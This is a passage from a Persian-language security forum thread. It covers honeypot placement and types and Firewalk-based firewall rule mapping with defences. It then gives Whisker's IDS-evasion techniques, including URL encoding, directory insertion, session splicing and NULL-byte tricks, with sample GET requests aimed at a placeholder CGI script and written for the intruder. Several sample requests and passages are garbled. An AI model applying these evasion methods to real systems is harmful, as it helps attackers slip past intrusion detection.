يک Honeypot مي­تواند در هرجايي که يک سرويس دهنده قادر است قرار بگيرد، واقع شود ولي مطمئناً برخي جاها بهتر از بقيه است.
يک Honeypot با توجه به سرويس­هاي مورد استفاده مي­تواند در اينترنت يا اينترانت مورد استفاده قرار گيرد. اگر بخواهيم فعاليت­هاي خرابکارانة اعضاي ناراضي را در شبکة خصوصي کشف کنيم قرار دادن Honeypot در اينترانت مفيد است. در اينترانت Honeypot پشت ديوارة آتش قرار مي­گيرد.
در شبکة اينترنت يک Honeypot مي­تواند در يکي از محل­هاي زير قرار گيرد :
1-جلوي ديوارة آتش
2-درون ­[6]DMZ
شکل فوق قرار گرفتن Honeypot را در محل­هاي گفته شده نشان مي­دهد.
هر کدام از اين دو مزايا و معايبي دارد که به آن مي­پردازيم.
با قرار گرفتن Honeypot در جلوي ديوارة آتش، خطر داشتن يک سيستم تحت سيطرة نفوذگر در پشت ديوارة آتش از بين مي­رود و هيچ خطر اضافي (منتج از نصب Honeypot) متوجه شبکة داخلي نمي­شود. 
يک Honeypot مقداري ترافيک ناخواسته مثل پويش درگاه يا الگوهاي حمله را ايجاد و جذب مي­کند که با قرار دادن Honeypot در بيرون از ديوارة آتش چنين وقايعي توسط ديوارة آتش ثبت نمي­شود و سيستم تشخيص نفوذ داخلي (که در حالت عادي در مواجهه با چنين رخدادهايي هشدار توليد مي­کند) پيغام هشدار توليد نمي­کند.
عيب قرار گرفتن Honeypot جلوي ديوارة آتش اين است که نفوذگران داخلي به راحتي فريب نمي­خورند، مخصوصاً اگر ديوارة آتش ترافيک خروجي و در نتيجه ترافيک دريافتي Honeypotرا محدود کند.
قرار گرفتن Honeypot درون يک DMZ يک راه­حل خوب به نظر مي­رسد به شرطي که امنيت ديگر سيستم­هاي درون DMZ در برابر Honeypot برقرار شود. از آن­جايي که فقط سرويس­هاي مورد نياز اجازة عبور از ديوارة آتش را دارند، دسترسي کامل به اغلب DMZها ممکن نيست. به اين دليل و با توجه به اين­که تنظيم قوانين مرتبط روي ديوارة آتش کاري زمانبر و مخاطره­آميز است، در چنين حالتي قرار دادن Honeypot جلوي ديوارة آتش مورد توجه قرار مي­گيرد.
قرار دادن Honeypot پشت ديوارة آتش، مي­تواند باعث بروز خطرات امنيتي جديدي در شبکة داخلي شود، مخصوصاً اگر شبکة داخلي توسط ديواره­هاي آتش اضافي در برابر Honeypotايمن نشده باشد. توجه داشته باشيد که اگر Honeypot را پشت يک ديوارة آتش قرار مي­دهيد، بايد قوانين ديوارة آتش را طوري تنظيم کنيد که دسترسي از اينترنت مجاز باشد. 
بزرگ­ترين مشکل وقتي به وجود مي­آيد که يک نفوذگر خارجي کنترل Honeypot داخلي را در اختيار مي­گيرد. در اين صورت نفوذگر امکان دسترسي به شبکة داخلي را از طريقHoneypot به دست مي­آورد. زيرا اين ترافيک، به عنوان ترافيک ورودي به Honeypot در نظر گرفته مي­شود و از آن­جايي که ترافيک ورودي به Honeypot مجاز است، ديوارة آتش جلوي عبور اين ترافيک را نمي­گيرد. بنابراين ايمن کردن Honeypot داخلي ضروري است. دليل اصلي قرار گرفتن Honeypot پشت ديوارة آتش شناسايي نفوذگران داخلي است.
بهترين راه­حل قرار دادن يک Honeypot درون DMZ به همراه يک ديوارة آتش است. بسته به اين­که هدف شناسايي نفوذگران داخلي يا خارجي است، ديوارة آتش مي­تواند به اينترنت يا اينترانت وصل شود. 

در حقيقت شما مي­خواهيد از طريق Honeypot يک مانور ترتيب بدهيد و به يک دشمن فرضي حمله کنيد يا در مقابل يک دشمن فرضي بايستيد. لذا شرايط را به صورت واقعي تنظيم کنيد.



1-Trojan Horse

2-Backdoor

3-Intrusion Detection System

4-Social Engineering

5-Sniffer

6-DeMilitarized Zone ، بخش عمومي شبکه شامل سرويس­دهنده­هاي وب، پست الکترونيکي، FTP و ... که به عموم کاربران اينترنت سرويس مي­دهد

تقسيم­بندي Honeypotها از نظر کاربرد
از ديدگاه کاربرد و استفاده­اي که قرار است از سيستم شود Honeypotها به دو دسته تقسيم مي­شوند :


  •  
  • <LI class=MsoNormal dir=rtl style="MARGIN: 12pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l0 level1 lfo1">Production Honeypot : اين نوع سيستم وقتي که سازمان مي­خواهد شبکه و سيستم­هايش را با کشف و مسدود کردن نفوذگران حفاظت کند و نفوذگر را از طريق قانوني در دادگاه مورد پيگرد قرار دهد، مورد استفاده قرار مي­گيرد.
  • Research Honeypot : اين نوع سيستم وقتي که سازمان مي­خواهد فقط امنيت شبکه و سيستم­هاي خود را با آموختن روش­هاي نفوذ، منشا نفوذ، ابزارها وexploitهاي مورد استفادة نفوذگر مستحکم­تر کند، استفاده مي­شود.

بسته به هدف سازمان و اين که از يک Honeypot چه مي­خواهيد، مي­توانيد يکي از دو نوع Honeypot ذکر شده را انتخاب کنيد.

تقسيم­بندي Honeypotها از نظر ميزان تعامل با نفوذگر 
Honeypotها از لحاظ ميزان تعامل و درگيري با نفوذگر به سه دسته تقسيم مي­شوند :


  •  
  • <LI class=MsoNormal dir=rtl style="MARGIN: 12pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l2 level1 lfo2">دستة اول : Honeypot با تعامل کم[1] <LI class=MsoNormal dir=rtl style="MARGIN: 12pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l2 level1 lfo2">دستة دوم :Honeypot با تعامل متوسط[2]
  • دستة سوم : Honeypot با تعامل زياد[3]


Honeypot با تعامل کم
در دستة اول، بر روي ماشين سرويس­هاي جعلي و ابتدايي مشخصي مثل Telnet و Ftp نصب مي­شود. اين سرويس­ها با استفاده از پروسه­اي که روي درگاه مشخصي گوش مي­کند، پياده­سازي مي­شوند. نفوذگر فقط قادر است با اين سرويس­ها ارتباط برقرار کند. به عنوان مثال يک Honeypot با تعامل کم مي­تواند شامل يک Windows 2000 Server به همراه سرويس­هايي مثل Telnet و Ftp باشد. يک نفوذگر مي­تواند ابتدا با استفاده از Telnet روي Honeypot نوع سيستم عامل آن را تشخيص دهد، سپس با يک صفحة ورود روبرو مي­شود. نفوذگر دو راه براي دسترسي به Honeypot دارد يکي ورود به زور[4] و ديگري حدس زدن کلمة عبور[5]Honeypot مي­تواند تمام تلاش­هاي نفوذگر را جمع­آوري کند. 
در اين حالت نفوذگر نمي­تواند هيچ­گونه ارتباطي با سيستم عامل برقرار کند و ارتباط نفوذگر فقط به تلاش براي ورود به سيستم محدود مي­شود. اين مساله ميزان خطر را کاهش مي­دهد چون پيچيدگي­هاي سيستم عامل حذف مي­شود. به عبارت ديگر اين يک عيب است چرا که نمي­توانيم ارتباطات نفوذگر با سيستم­عامل را که مورد علاقة ماست ببينيم.
Honeypotهاي دستة اول با کم کردن تعامل خود با نفوذگر ميزان خطر را به حداقل کاهش مي­دهد و پايين­ترين ميزان خطرپذيري را داراست.
به کمک اين ماشين­ها اطلاعات محدودي مثل زمان نفوذ، پروتکل مورد استفاده، آدرس IP مبدا و مقصد، ... را مي­توان به دست آورد.
يک Honeypot با تعامل کم مي­تواند با يک سيستم تشخيص نفوذ passive مقايسه شود. هيچ کدام نمي­تواند تغييري در ترافيک بدهد يا با نفوذگر يا جريان ترافيک ارتباط برقرار کند. فقط براي ايجاد گزارش[6] استفاده مي­شوند و اگر ترافيک ورودي با الگوهاي از قبل تعيين شده مطابقت کند، هشدار مي­دهند.
اين دسته از Honeypotها فقط براي شناسايي حمله­هاي شناخته شده خوب است ولي براي کشف حمله­هاي ناشناخته هيچ ارزشي ندارد.

Honeypot با تعامل متوسط
دستة دوم در مقايسه با دستة اول امکان بيشتري براي تعامل با نفوذگر فراهم مي­کند ولي هنوز هم مثل دستة اول نفوذگر هيچ ارتباطي با سيستم­عامل ندارد. دايمون­[7]هاي جعلي فراهم شده پيشرفته­ترند و دانش بيشتري راجع به سرويس­هاي ارائه شده دارند.
در اين حالت ميزان خطر افزايش مي­يابد. احتمال اين که نفوذگر يک حفرة امنيتي يا يک آسيب­پذيري پيدا کند بيشتر است زيرا پيچيدگي Honeypot افزايش مي­يابد. 
نفوذگر امکان بيشتري براي ارتباط با سيستم و بررسي آن دارد و راحت­تر فريب مي­خورد.
هم­چنين با توجه به تعامل بيشتر، امکان انجام حمله­هاي پيچيده­تري وجود دارد که مي­توان با ثبت و آناليز کردن آن­ها به نتايج دلخواه دست يافت.
همان طور که گفته شد نفوذگر هيچ ارتباطي با سيستم عامل ندارد و در سطح برنامه­هاي کاربردي فعاليت مي­کند.
توسعة يک Honeypot با تعامل متوسط کاري پيچيده و زمانبر است. بايد دقت شود که تمام دايمون­هاي جعلي تا جايي که ممکن است ايمن شوند. نسخه­هاي توسعه يافته اين سرويس­ها نبايد داراي همان آسيب­پذيري­هاي همتاهاي (نسخه­هاي) واقعي باشند زيرا اين اصلي­ترين دليل جايگزيني آن­ها با نسخه­هاي جعلي است.
کسي که مي­خواهد چنين سيستمي را طراحي و پياده­سازي کند، بايد از دانش خوبي در مورد پروتکل­ها، سرويس­ها و برنامه­هاي کاربردي ارائه شده برخوردار باشد.
از اين Honeypotها مي­توان هم براي اهداف دستة research و هم براي اهداف دستة production استفاده کرد.

Honeypot با تعامل زياد
هرچه ميزان تعامل Honeypot با نفوذگر افزايش مي­يابد، ميزان پيچيدگي و خطر هم افزايش مي­يابد ولي به همان نسبت نتايجي که حاصل مي­شود نيز بهتر است.
آخرين و پيشرفته­ترين دسته از Honeypotها دستة سوم است. طراحي، مديريت و نگهداري اين Honeypotها کاري واقعاً زمانبر است. در ميان سه نوع Honeypot اين Honeypotها داراي خطر زيادي هستند ولي اطلاعات واسناد زيادي براي تحليل جمع مي­شود. 
در اين نوع Honeypot نفوذگر ارتباط کاملي با سيستم­عامل دارد. 
يکي از اهداف نفوذگر به دست آوردن دسترسي در بالاترين سطح (root يا superuser) ماشيني که به اينترنت وصل است مي­باشد. اين Honeypot چنين امکاني را در اختيار نفوذگر قرار مي­دهد. به محض اين که نفوذگر اين امکان را پيدا کند کار اصلي او شروع مي­شود.
با استفاده از اين نوع Honeypot مي­توانيم به اطلاعاتي نظير اين که نفوذگران بيشتر از چه ابزارها و exploitهايي استفاده مي­کنند، از چه کشورهايي هستند، به دنبال چه نقاط آسيب­پذيري هستند، ميزان دانش آن­ها در مورد نفوذگري و .... دست پيدا کنيم.
نفوذگر پس از اين که دسترسي سطح root روي سيستم را به دست آورد، قادر است هرکاري که بخواهد روي سيستم تحت کنترل انجام دهد. اين سيستم في­نفسه ايمن نيست بنابراين هيچ سيستمي روي شبکه را نمي­توان امن در نظر گرفت.
بايد قبل از اين گونه Honeypotها يک ديوارة آتش نصب کنيم، زيرا در غير اين صورت نفوذگر پس از اين که کنترل کاملي بر ماشين به دست آورد مي­تواند از آن براي طراحي حملاتي مثل[8]DDoS عليه ماشين­هاي ديگر استفاده کند. براي جلوگيري از اين مساله بايد ديوارة آتش به گونه­اي تنظيم شود که فقط ترافيک ورودي به سيستم مجاز باشد و ترافيک خروجي آن را مسدود کند.
هم­چنين مي­بايست سطح دسترسي اين سيستم به شبکة داخلي محدود شود تا نفوذگر نتواند با استفاده از آن به ديگر سيستم­هاي موجود در شبکة داخلي آسيبي برساند.
کنترل و نگهداشت چنين Honeypotاي کاري فوق­العاده زمانبر است. سيستم دائماً بايد تحت نظر باشد. Honeypotاي که تحت کنترل نباشد نه تنها هيچ کمکي نمي­کند بلکه خودش به عنوان يک نقطة خطر يا حفرة امنيتي مطرح می­شود.
با فراهم کردن امکان ارتباط کامل نفوذگر با سيستم­عامل، او مي­تواند فايل­هاي جديدي را روي سيستم نصب کند. اين جاست که اين نوع Honeypot با ثبت کردن و آناليز اين فعاليت­ها قدرت خود را نشان مي­دهد. جمع­آوري اطلاعات در مورد گروه­هاي نفوذگري هدف اصلي اين دسته از Honeypotها است و همين امر خطرپذيري بيشتر را توجيه مي­کند.
از اين نوع Honeypot فقط براي اهداف دستة research استفاده مي­شود.

جدول زير کاربرد هر کدام از Honeypotها را با توجه به ميزان تعامل آن با نفوذگر نشان مي­دهد :



production
research
تعامل کم
ü 
-
تعامل متوسط
ü 
ü 
تعامل زياد
-
ü


مزايا و معايب هر کدام از انواع Honeypot در جدول زير آمده است:



ميزان تعامل با نفوذگر
کم
متوسط
زياد
ارتباط با سيستم­عامل
خير
خير
بلي
ميزان خطر
کم
متوسط
زياد
اطلاعات جمع­آوري شده
تلاش­ها براي ورود به سيستم
درخواست­هاي رسيده از نفوذگر
همة ترافيک سيستم
کنترل کامل بر سيستم
خير
خير
بلي
دانش لازم براي توسعة سيستم
کم
زياد
زياد
زمان نگهداري سيستم
کم
کم
خيلي زياد

با توجه به عوامل ذکر شده و اين که در سازمان شما ميزان اهميت هر کدام از اين عوامل چه اندازه است و نتايجي که مي­خواهيد از يک Honeypot به دست آوريد، مي­توانيد يکي از سه نوع Honeypot ذکر شده را براي سازمان خود انتخاب کنيد.




1-Low-Interaction

2-Medium-Interaction

3-High-Interaction

4-Brute Force

5-Password Guessing

6-Log

7-Daemon

8-Distributed Denial Of Service
 

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  1:56 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

شکستن Firewall امروز در مورد Firewalk ميخوام صحبت کنم . اين نرم افزار ، نرم افزاريه که بوسيله اوون می توان ديوار آتش رو تجزيه و تحليل کرد . 
Firewalk سعی می کنه تا پورتهايی رو که بوسيله ديوار آتش باز موونده رو پيدا کنه . مزيت اين نرم افزار نسبت به Nmap اينه که می توونه پورتها حتی با وجود Firewall چک کنه . کاری که Nmap نمی توونست با اطمينان انجام بده .
حالا ببينيم عملکرد راهروی آتش چيه ؟ راهروی آتش سعی می کنه تا بفهمه ديوار آتش چه بسته هايی رو حذف می کنه . برای اينکار به دو آدرس احتياج داره . يکی آدرس مسيرياب ***** کننده و ديگری آدرس ماشين هدف . اين در آدرس رو می توونيد با استفاده از Nmap بدست بياريد . 
در مرحله بعدی سعی می کنه قواعد ديوار آتش رو بدست بياره . اينکار رو در دو مرحله انجام می ده :
در اولين مرحله سعی می کنه تا تعداد مسير يابها تا شبکه مورد نظر رو بدست بياره . اينکار با استفاده از فيلد TTL و با تنظيم اوون به 1 و 2 و 3 و ... انجام می شه . در اين مرحله فقط تعداد مسيريابها تا شبکه هدف با توجه به پاسخ دريافتی تعيين می شه . 
سپس پورتهايی رو که بوسيله ديوار آتش بسته شدند رو پيدا می کنه . برای اينکار يه سری بسته با TTL معادل N+1 و تنظيم TCP با پورت مورد جستجو بسمت هدف ارسال می کنه تا بسته رو دقيقا ماشين بعد از ديوار آتش دريافت کنه . اگر در پاسخ ، بسته ICMP Time Exceeded ارسال بشه ، Firewalk نتيجه می گيره که پورت مورد نظر در ديوار آتش باز است . و اگر پاسخی برنگشت ، نتيجه می گيره که پورت مورد نظر در ديوار آتش بسته است .
اما نکاتی که در مورد راهروی اتش مهمه :
1- راهروی اتش برای تست پورتهای هست که بوسيله ديوار اتش حفاظت می شوند و نه شبکه های مجهز به ***** .
2- وقتی راهروی اتش پورتی رو باز اعلا می کنه يا می گه که بسته است ، به اين معنيه که Firewall اوون پورت بلوکه کرده باشه يا آزاد گذاشته باشه و به اين معنی نيست که اوون پورت هموون وضعيت رو روی ماشين هدف داره .
حالا اگه يه پورت بوسيله Firewall باز موونده باشه ولی در ماشين هدف پروسه ای برای پردازش بسته های ارسالی به اوون پورت نباشه ، هکر سعی می کنه تا پروسه ای روی ماشين هدف فعال کنه تا به اوون پورت گوش بده . در اين صورت بسته ها بدون مزاحمت از جانب ديوار آتش به ماشين هدف می رسند .
برای جلوگيری از اين گونه خطرات بهتره :
1- تمام پورتهای باز به استثنای اوونايی که بايد باز باشند ، رو ببنديد .
2- برای اطمينان به جای ديوار اتش از پروکسی استفاده کنيد .
3- سعی کنيد روی ماشينهای مهم شبکه ICMP رو غيرفعال کنيد .


Fire Walkچگونه كار می كند!؟

Fire Walkاز فيلد TTL مربوط به IP Header استفاده ميكند و از آنجايی كهTTL ، بخشی از هدر IP است، مهاجم می تواند از Fire Walk استفاده كند تا دريابد كدام درگاهها برای UDP و يا - TCP كه در بالای IP سوار می شوند -***** می شود .

Fire Walkمستلزم اين است كه مهاجم دو آدرسIP ، وارد كند تا پويش خود را شروع كند. اولين آدرسIP ، آدرس خود ***** است و IP دوم، مربوط به ماشين مقصد و طرف مقابل ***** بسته است .

Fire Walkيك سری بسته باTTL های افزايشی ميفرستد تا تعيين كند چند جهش، بين ابزار و ديوار آتش وجود دارد .اگر بسته از ***** عبور كند، پيغام ICMP Time Exceeded بلافاصله توسط سيستم در طرف ديگر ***** فرستاده ميشود .اگر اين پيغام برگردد،Fire Walk ميداند كه درگاه از طريق ديوار آتش باز است .اگر هيچ چيز برنگردد، به احتمال زياد درگاه توسط ديوار آتش ***** شده است .نفوذگر با ارسال اين بستهها با شماره درگاههای TCP و UDP در حال افزايش، ميتواند اطلاعات بسيار دقيقی از قوانين و قواعد ***** به دست آورد .

ضعف اين برنامه اين است كه بر روی ديوارهای آتش مبتنی بر پراكسی كار نميكند، زيرا پراكسی بسته ها را ارسال نمی كند، بلكه بسته ها را از يك طرف گيت وی جذب و يك اتصال جديد در طرف ديگر ايجاد ميكند و تمام اطلاعات TTL را از بين می برد .

دفاع در برابرFire Walk 

راههای متعددی برای دفاع در برابر اين برنامه قدرتمند وجود دارد كه به برخی از آنها اشاره می شود:

راه اول: جايگزين كردن برنامه های ***** بسته با ديوارهای آتش مبتنی بر پراكسی است. از آنجايی كه پراكسيها اطلاعات TTL را ارسال نمی كنند، مهاجم ديگر نمی تواند از Fire Walk استفاده كند. اين روش می تواند مشكلاتی نيز برای شما ايجاد كند از جمله ديوارهای آتش مبتنی بر پراكسی، كارآيی كمتری نسبت به فيلترهای بسته دارند، از اين رو اين راه حل مبارزه با Fire Walk ميتواند باعث كندی شبكه شود. رهايی از دست فيلترهای بسته ممكن است سرويسهايی را كه ارائه می كنيد، محدود كند .

راه دوم : می توانيد با ***** كردن پيغامهای ICMP Time Exceeded كه از شبكه شما خارج ميشوند، در برابر Fire Walk دفاع كنيد .در يك ديوار آتش خارجی، تمام اين نوع پيغامها را متوقف كنيد .بدين ترتيب نفوذگر نخواهد توانست پيغام مورد استفاده Fire Walk را دريافت كند تا مجموعه قواعد ديوار آتش را پيدا كند .با اين حال اگر هنوز هم از حمله Fire Walk و ضعف ديوار آتش خود نگرانيد، ميتواند علاوه بر اين تكنيكها از تكنيكهای پيشنهادی كارشناسان خبره نيز استفاده كنيد.

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  1:57 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

پويش و جستجوي اسكريپتهاي ناقص برنامه هاي Cgi 
استاندار CGI مخفف Common Gateway Interface است
CGI براي پردازش و تجزيه و تحليل اطلاعات ای که از سوي کاربر ارسال شده به کار مي رود وتوان ارتباط بين Server ساير برنامه ها را مشخص شده درسرور را دارا می باشد
اسکريپتهاي CGI عليرغم توان تشان مسیربرنامه ها را کند مي کنند چرا که براي اجراي يک اسکريپت CGI مراحل زيادي بايد انجام شود وعلت این امر به ان جهت است که اول - اطلاعات بايد دو بار بين مرورگر وServer منتقل شوند دوم - سرور بايد مدتي را صرف پردازش اطلاعات ارسالی از مرورگر نمايد سوم - اجراي يکCGI به مانند درخواست يک صفحه جديد است با اين تفاوت که زماني نيز بايد صرف اجراي آن CGI بر روي سرور شود 
چرا که شما با ارسال يک فرم يا کليک کردن روي يک ابر پيوند درخواستي را براي اجراي يک CGI به سويServer ارسال ميکند

شما در مرحله پويش و جستجوي سيستم توان پيدا كردن اسكريپتهاي ناقص 
وضعيف نوشته شده برخي از برنامه هاي CGI دارید که به قدري ضعيف نوشته شداند كه بدون هيچ پردازشي داده هاي ارسالي از صفحه وب هدف را مستقيم روي سرويس دهنده اصلي اجرا مي كنند مثلا يك اسكريپ CGIرا در نظربه گيريد كه يك فرمان پرس وجو Query را ازبانک اطلاعا ت هدف گرفته و آنرا مستقيما به S QLserverمي فرستد 
مكانيزم هاي نفوذ
شمااز طريق برنامه نويسي با پورت80 از سرويس دهنده ارتباط برقرار ميكند وتقاضاي راه اندازي يك اسكريپ را با متودGET 
یعنی بصورت مصنوعي FTP توليد و به سرويس دهنده مي فرستد.اسكريپتهاي CGI ضعيف هر چه كه ارسال شده باشد بافرض أنكه از صفحه وب و از طريق فرم أمده اجرا ميكنند  .
بنابر اين شما با يافتن همين نقاط ضعف در اسكريپتهاست .

براي جستجوي اسكريپتهاي أسيب پذير .ابزارهاي زیادی وجود دارد که قبلا چند 
تای انها را معرفی کرده ام
شما به غير از جستجوي آسيب پذيري سعي كنید سيستم IDS هدف را گول بزنید
شما برای این امر می توانید از ابزار whisker استفاده کنید
توان whisker در بررسي نقاط ضعف اسكريپهاي در سطح لايه وسطح TCP/IP را مي شناسد و انها را ازمايش مي كند W hisker نقاط ضعف بيش از 500 نوع اسكريپ CGI وASP را پیدا می کند و قادر است با سرويس دهنده هاي وب مجازيVitual Webserver كه بر روي يك ماشين واحد اجرا مي شوند، ارتباط برقرار كند در ضمن روشي براي حدس User IDو كلمه عبور كه در هنگام احراز هويت (Web Authentication )در خواست مي شود،پياده سازي كرده 
این روش ها به شرح زیر
URLencoding: 
آدرس در URLارسالي با كدهاي معمولي ASCIIارسال نمی کند
اول هر كاركتر با معادل يوني كدآن با قالب % xxتعريف شده در MIME می گذارد و سپس ارسال می کند برخي از سيستمهاي IDS نمی توانند چنين قالبي را تشخيص دهند 
GET /%63%67%69%2d%62%69%6e/broken .cgi HTTP/ 1.0
استاندارد MIME، براي معادلسازي كاركترها در رشته URLابتدا كاركتر% و سپس كد هگزاسيمال عدد قرار مي گيرد. 
%63 c.%67 g .%69 i.%2d - .%62 b .%69 I .%6e 
%63567569%2d%6956e CGI-bin
Directory inrertion/./: URL
كاراكترهاي/./ارسالي از طرف شما در برخي از سرويس دهنده هاي وب به اين شكل تفسير مي می کند یعنی به شاخه جاري تغيير مسير بدهيد تغيير مسير به شاخه جاري هيچ مشگلی ندارد وURLرا بشكل اي عوض مي کند و به الگوي حمله شباهت ندارد و IDS آنرا مجاز خیال کند 
GET /. /cgi -bin /./broken. Cgi HTTP /1.0 
peremator URL Ending
درURLارسالي اطلاعاتي در خصوص اسكريپت مورد نظر قرار داده نمي شود در عوض اين اطلاعات در بخش سر ايند HTTPجاسازي مي شوند

GET /HTTP /1.0 /r/ Nheader: …/../cgi -bin /broken. Cgi /HTTP/ 1.0 

LONGURL
شاخه است كه وجود نداردURL ارسالي شامل نام بسيار طولاني يك شاخه است درانتها كاركترهاي /../قرار مي گيرد سرويس دهنده وب از نام شاخه چشم پوشي مي شود IDSفقط بخش اول از أدرسURLرا برسي مي كنند واین تقاضاي خطر به نظرش مي رسد 
Cgi -bin /bvroken .cgi HTTP/1.0 / .. GET / this isbunnchofjunktomaketh URL long/

Fake parameter:url
پارامترهائي هستند كه هيچ خاصيت يا زیانی ندارد فقط URL رابه شكل عوض مي کتد IDS أنرا خطر بداند 
GET / index. Html �param=/../cgi-bin/broken .cgi HTTP /1.0

TABsseparetion
كاركتر فاصله خالي spaceجدا می کند وبخشهاي مختلف URL ارسالي بجاي آن با كاركتر TAB عمل کند URL به شكل اي عوض مي كند تا به الگوي حمله شبا هت نداشته باشد و IDS أنرا بی خطر بداند 
GET /bin broken /broken .cgi HTTP/1.0 
Case senistiivity
سيستم هاي هستند که IDSانتظارURL با حرف كوچك دارند ولي تعدادي هم هستند که از سرويس دهنده هاي وب ارسال URL با حروف بزرگ و كوچك برای ان فرق نمي كنند و قابل اجراست بدينشكل IDS
گول مي خورد و تقاضارا اجرا مي کند

Windows delimiter 
در ويندوز استفاده از علامت \بجاي /مجاز مي شناسد ودر بعضی از سيستم هاي IDS به أن حساسيت ندارند و در مورد شكل URLگمراهش مي کند
GET/ CGI-BIN/broken .cgi HTTP /1.0 
Session Splicing روش این مكانيزم Session Splicing در سطح لايه TCP پياده سازي شده وابتدا قطعه قطعه شده و در بسته هاي يك تا سه كاركتري ارسال مي شود IDS ،توان بازسازي قطعات را ندارند و مجبور می شود براي اين بسته ها اجازه صادركند 

ET 
/GET/ cgi-bin /broken .cgi HTTP /1.0 
i- 
bin 
/br 
… 
NULL Method
IDS براي تحليل رشته URL از توابع رشته اي استفاده مي كنند. در بين رشته URL، كاركتر%00(NULL Character) وجود داشته باشد توابع رشته اي آنرا بعنوان خاتمه رشته تلقي مي كنند وبدين الگو IDS گول مي خورد 
GET%00/ cgi-bin /broken .cgi HTTP /1.0

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  1:59 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

ابزار Whisker و فرار از GET 


يكي از روشهايي پويش و جستجوي سيستم يافتن اسكريپتهاي ناقص وضعيف است
برخي از برنامه هاي CGIبه قدري ضعيف نوشته شده اند كه بدون هيچ پردازشي داده هاي ارسالي از صفحه وب سايت کاربر را مستقيما روي سروراصلي اجرا مي شود
مثال اول _ يك اسكريپ CGI كه يك فرمان پرس وجو Queryرا از صفحه وب کاربر گرفته و آن را يک راست به SQLserverمي فرستد در حقيعت اين يک روش عادي بطور معمول است اسكريپ را از طريق صفحه وب راه اندازي مي كنند ولي اگر کاربرنفوذگر باشد نه از طريق صفحه وب بلكه از طريق برنامه نويسي با پورت80 از server ارتباط برقرار مي كند وتقاضاي راه اندازي يك اسكريپ را با متود GET مي کند به شکل مصنوعي توليد و به server ارسال مي کند واسكريپتهاي CGI ضعيف و خر هر چه كه ارسال شده باشد بافرض أنكه از صفحه وب و از طريق فرم أمده اجرا مي كنند
بنابر اين يكي از اهداف شما پيدا کردن همين نقاط ضعف در اسكريپتهاست براي جستجوي اسكريپتهاي أسيب پذير ابزارهاي متنوعي وجود دارد كه يکي از بهترين ها اين ابزار ها whisker است
زيرا به غير از جستجوي سعي مي كند سيستم IDS را نيز گول بزند
Whisker مبتني بر Perl بوده وروي تمام محيطهائي كهزبان Perlرا پشتيباني مي كنند قابلاجراست در بررسي نقاط ضعف اسكريپهاي CGIامكاناتي در نظر گرفته شده در سطح TCP/IP قدرتمند است و در سطح لايه كاربرد ووب 
Whisker ضعف بيش از 600 نوع اسكريپ CGI وASP را مي خواند و انها را امتحان مي كند و قادر است با server مجازيVitual Webserver كه بر روي يك ماشين واحد اعمال مي شوند ارتباط برقرار كند در ضمن روشي براي حدس User ID و كلمه عبور كه در هنگام احراز هويت Web Authentication در خواست مي شود،پياده سازي كرده است
بزرگترين ويژگي whiskerآن است كه براي پويش وجستجوي نقاط ضعف اسكريپهايGGIاز روشهاي خاصي استفاده مي كند تا سيستمIDSوبweb IDS را گول بزند

IDS اجراي اسكريپت broken.cgi در ابزلر whisker و در سيستم ها مختلف

زماني که شما تقاضاي مبتني بر متودGET توسط سيستم IDS دريافت مي شود IDS كشف مي كند كه سعي در اجراي اسكريپت broken.cgiاز شاخه/bin/cgi است .GET /cgi-bin /broken.cgi HTTP/1.0 
بدين ترتيب مانع اجراي اسكريپت مربوطه خواهد شد ولي در
whisker روش متنوع و قدرتمند براي گول زدن IDS بكار مي گيرد كه در اين روشها در زير معرفي شده درتمام اين روشها منظور از تقاضا ارسال يك فرمان HTTP به سرويس دهنده وب براي فعل وانفعال با برنامهCGI تلقي شده است 
URLencoding:قسمت آدرسدر URLارسالي با كدهاي معمولي ASCIIارسال نمي شود
بلكه ابتدا هر كاركتر با معادل يوني كدآن يعني با قالب % xxتعريف شده در MIME جايگزين و سپس ارسال مي شود.برخي از سيستمهاي IDS قادر نيستند چنين قالبي را تشخيص به دهند و لذا تقاضاي شما كشف نخواهدشد
GET /%63%67%69%2d%62%69%6e/broken .cgi HTTP/ 1.0 
نكته:طبق استاندارد MIME براي معادل سازي كاركترها در رشته URLابتدا كاركتر% و سپس كد هگزاسيمال عدد قرار مي گيرد. 
%63 c.%67 g .%69 i.%2d - .%62 b .%69 I .%6e n
%63567569%2d%6956e CGI-bin Directory inrertion/./: URLارسالي شما كاراكترهاي/./است كه در برخي از سرور دهنده هاي وب به اين شكل تعبير وتفسير مي شود يعني شما ان را به شاخه ديگر تغيير مسير مي دهيد تغيير مسير به شاخه جاري هيچ خاصيت يا ضرري ندارد بلكه فقط شكل URLرا بگونه ايتغيير مي دهد تا روش شما بايد بگونه اي باشد که به الگوي حمله شباهت نداشته باشد و IDS آنرا مجاز بداند 
GET /. /cgi –bin /./broken. Cgi HTTP /1.0 

peremator URL Ending:درURLارسالي اطلاعاتي در خصوص اسكريپت مورد نظر قرار داده نمي شود و در عوض اين اطلاعات در بخش سر ايند HTTPجاسازي مي شود به مثل زير دقت کنيد
GET /HTTP /1.0 /r/ Nheader: …/../cgi –bin /broken. Cgi /HTTP/ 1.0 
اگر شما با پروتكلHTTPآشنا باشيدصحت URL فوق واعتبار تقاضاي GETراتائيد مي كنيد و در حقيغت همين شکلاست
